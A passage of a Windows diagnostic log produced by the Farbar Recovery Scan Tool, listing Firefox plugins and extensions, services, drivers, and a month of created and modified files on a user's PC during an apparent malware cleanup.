FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Oovoo Toolbar - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\toolbar_OVO2V7@apn.ask.com.xpi [2013-08-27]
FF Extension: Adblock Plus - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-22]
FF Extension: Hotspot Shield Extension - C:\Program Files\Mozilla Firefox\browser\extensions\afproxy@anchorfree.com [2014-09-24]
FF HKCU\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]

Chrome:
=======

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\STacSV.exe [221266 2009-06-29] (IDT, Inc.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R3 itecir; C:\Windows\System32\DRIVERS\itecir.sys [65640 2010-07-13] (ITE Tech. Inc. )
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
S1 MpKsl8c5a2e11; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsl8c5a2e11.sys [X]
S1 MpKsla09b7e5b; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsla09b7e5b.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:03 - 2014-09-25 10:51 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 09:50 - 2014-09-25 09:53 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-24 23:41 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:36 - 2014-09-09 17:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 00:06 - 2014-09-24 00:10 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2014-07-25 12:55 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-09-23 22:44 - 2014-07-25 12:49 - 00272808 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:32 - 2014-09-22 22:33 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:28 - 2014-09-22 21:29 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:05 - 2014-09-22 21:14 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 19:54 - 2014-09-22 19:55 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 18:54 - 2014-09-25 10:51 - 00000000 ____D () C:\FRST
2014-09-22 18:54 - 2014-09-25 10:03 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-22 15:30 - 2014-09-24 22:50 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-22 15:30 - 2014-09-24 22:50 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
2014-09-22 15:21 - 2014-09-25 10:46 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:49 - 2009-06-29 12:44 - 12021852 _____ (IDT, Inc.) C:\Windows\system32\idtcpl.cpl
2014-09-21 18:49 - 2009-06-29 12:44 - 03600384 _____ (IDT, Inc.) C:\Windows\system32\stlang.dll
2014-09-21 18:49 - 2009-06-29 12:44 - 00536576 _____ (IDT, Inc.) C:\Windows\system32\idtmini1.exe
2014-09-21 18:49 - 2009-05-12 14:26 - 00047104 _____ (Creative Technology Ltd.) C:\Windows\system32\ctppld.dll
2014-09-21 18:49 - 2009-05-12 14:25 - 00511488 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo32.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00142848 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestacap.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00061440 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestaren.dll
2014-09-21 18:49 - 2009-03-02 12:47 - 00086016 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTCom.dll
2014-09-21 18:49 - 2009-03-02 12:08 - 00368640 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestecap.dll
2014-09-21 18:48 - 2014-09-21 18:50 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:48 - 2009-06-29 12:44 - 00914944 _____ (IDT, Inc.) C:\Windows\system32\stapo.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00485888 ____N (IDT, Inc.) C:\Windows\system32\stapi32.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00408576 _____ (IDT, Inc.) C:\Windows\system32\Drivers\stwrt.sys
2014-09-21 18:48 - 2009-06-29 12:44 - 00405504 _____ (IDT, Inc.) C:\Windows\system32\stcplx.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00175616 _____ (IDT, Inc.) C:\Windows\system32\st326217.dll
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 19:08 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:15 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 17:00 - 2014-09-21 19:08 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 17:00 - 2014-09-21 19:02 - 00000000 ____D () C:\temp
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-20 15:47 - 2014-09-24 08:49 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-20 15:30 - 2014-09-22 22:30 - 00000000 ____D () C:\AdwCleaner
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:36 - 2014-09-25 00:17 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-25 10:46 - 00002007 _____ () C:\Windows\setupact.log
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:54 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-14 20:35 - 2014-09-22 20:07 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-14 20:34 - 2014-09-22 20:07 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:19 - 2014-09-22 20:52 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 18:19 - 2014-09-22 19:55 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-13 18:39 - 2014-08-18 17:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-13 18:39 - 2014-08-18 17:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-13 18:39 - 2014-08-18 17:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-13 18:39 - 2014-08-18 17:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-13 18:39 - 2014-08-18 17:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-13 18:39 - 2014-08-18 17:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-13 18:39 - 2014-08-18 17:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-13 18:39 - 2014-08-18 17:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-13 18:39 - 2014-08-18 17:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-13 18:39 - 2014-08-18 17:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-13 18:39 - 2014-08-18 17:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-13 18:39 - 2014-08-18 17:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-13 18:39 - 2014-08-18 17:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-13 18:39 - 2014-08-18 17:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-13 18:39 - 2014-08-18 17:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-13 18:39 - 2014-08-18 16:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-13 18:38 - 2014-08-19 13:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-13 18:38 - 2014-08-18 18:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-13 18:38 - 2014-08-18 18:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-13 18:38 - 2014-08-18 17:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-13 18:38 - 2014-08-18 17:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-13 18:38 - 2014-08-18 17:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-13 18:38 - 2014-08-18 16:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-13 18:38 - 2014-08-18 16:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-13 18:34 - 2014-06-26 21:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-10 21:02 - 2014-08-01 07:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-10 21:02 - 2014-06-23 22:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-09-02 14:26 - 2014-08-22 21:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-09-02 14:26 - 2014-08-22 20:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:51 - 2014-09-25 10:03 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:51 - 2014-09-22 18:54 - 00000000 ____D () C:\FRST
2014-09-25 10:50 - 2010-11-20 17:01 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:46 - 2014-09-22 15:21 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-25 10:46 - 2014-09-20 00:36 - 00002007 _____ () C:\Windows\setupact.log
2014-09-25 10:46 - 2013-08-25 22:02 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-25 10:46 - 2012-10-09 23:28 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 10:46 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-25 10:15 - 2012-10-09 22:42 - 01515758 _____ () C:\Windows\WindowsUpdate.log
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 10:03 - 2014-09-22 18:54 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-25 09:53 - 2014-09-25 09:50 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-25 00:17 - 2014-09-20 08:36 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-24 23:40 - 2014-09-24 23:41 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:50 - 2014-09-22 15:30 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-24 22:50 - 2014-09-22 15:30 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 08:49 - 2014-09-20 15:47 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-24 08:49 - 2012-10-09 23:14 - 00109280 _____ () C:\Users\Matts\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-24 08:49 - 2011-04-11 22:24 - 00000000 ____D () C:\Windows\CSC
2014-09-24 08:49 - 2009-07-14 00:33 - 00408000 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-24 01:19 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-09-24 00:10 - 2014-09-24 00:06 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 23:09 - 2009-07-13 22:04 - 00000855 _____ () C:\Windows\system32\Drivers\etc\hosts_bak_621
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2013-11-26 15:08 - 00000000 ____D () C:\ProgramData\Oracle
2014-09-23 22:44 - 2012-10-10 15:58 - 00000000 ____D () C:\Program Files\Java
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:33 - 2014-09-22 22:32 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:30 - 2014-09-20 15:30 - 00000000 ____D () C:\AdwCleaner
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:29 - 2014-09-22 21:28 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:14 - 2014-09-22 21:05 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:52 - 2014-09-14 18:19 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 20:07 - 2014-09-14 20:35 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-22 20:07 - 2014-09-14 20:34 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-22 19:55 - 2014-09-22 19:54 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:55 - 2014-09-14 18:19 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
